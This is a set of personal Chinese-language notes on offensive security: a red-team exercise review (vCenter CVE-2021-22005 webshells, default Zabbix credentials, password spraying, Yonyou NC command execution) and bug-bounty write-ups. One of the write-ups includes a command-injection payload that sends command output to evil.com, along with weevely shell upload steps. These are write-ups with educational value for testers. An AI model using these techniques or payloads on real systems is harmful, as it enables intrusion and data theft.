随手记

一、某市级HW复盘总结

1. OA漏洞扫描工具：关注公众号，后台回复"oascanner"获取。发现 sql 注入
2. 内网横向
   1. 信息收集
3. 内网成果
   1. Vcenter，CVE-2021-22005，上传cmd webshell。
   2. 后续选择上传哥斯拉webshell，哥斯拉支持大文件下载。下载data.mdb文件，伪造cookie进入vcenter后台
   3. 虚拟机数量真不少，发现一台未锁屏机器，于是先对这台机器做权限维持。
   4. Zabbix，默认口令 Admin/zabbix，这个版本的zabbix不能通过后台的脚本功能执行命令。
4. 其他成果
   1. 密码碰撞，只进行3389，也可以进行445端口的SMB碰撞
   2. 用友NC，老版本，可进行文件上传，可存在BshServlet命令执行，直接上传webshell。
   3. 找数据库配置文件，路径/ierp/bin/prop.xml，密码是加密的，解密获取明文密码。数据库类型一般是oracle
   4. MDUT 提权

二、如何画出优雅的攻击流程图【攻防复盘必备】

1. ProcessOn
2. 画图平台和ICON

三、从.Git泄露到RCE，赏金10,000美元！

1. nuclei的输出显示了几个主机上暴露的 .git/ 目录，通过这些目录可以下载源代码

2. git-dumper工具 还原代码

3. 代码中他们使用了对本地 bash 脚本的调用来通过 shell_exec 保存和删除 ftp用户()函数，造成 rce。

4. 可以通过将命令发送到 URI 或通过 base64 编码形式的 POST 正文来读取命令的输出：someusr; curl <https://evil.com/$>(id|base64|tr -d "\\n");

5. 只剩下上传shell，唯一的障碍是对当前目录没有写权限，所以上传shell到uploads/ （生成shell，我用的是weevely工具）

   1.将 shell 保存在本地 txt 中，以便能够通过 curl 传输它，并在自己的主机上启动服务器用 ngrok 建立隧道

   2.发送一个payload，将我们的 shell 保存在uploads/shell.php

   3.使用weevely连接到上传的 shell

四、通过链式攻击劫持会话获得$2500奖励

1. https://example.com?redirect=${redirectURL}，首先是数学表达式${2*2}来确定是否存在模版注入漏洞。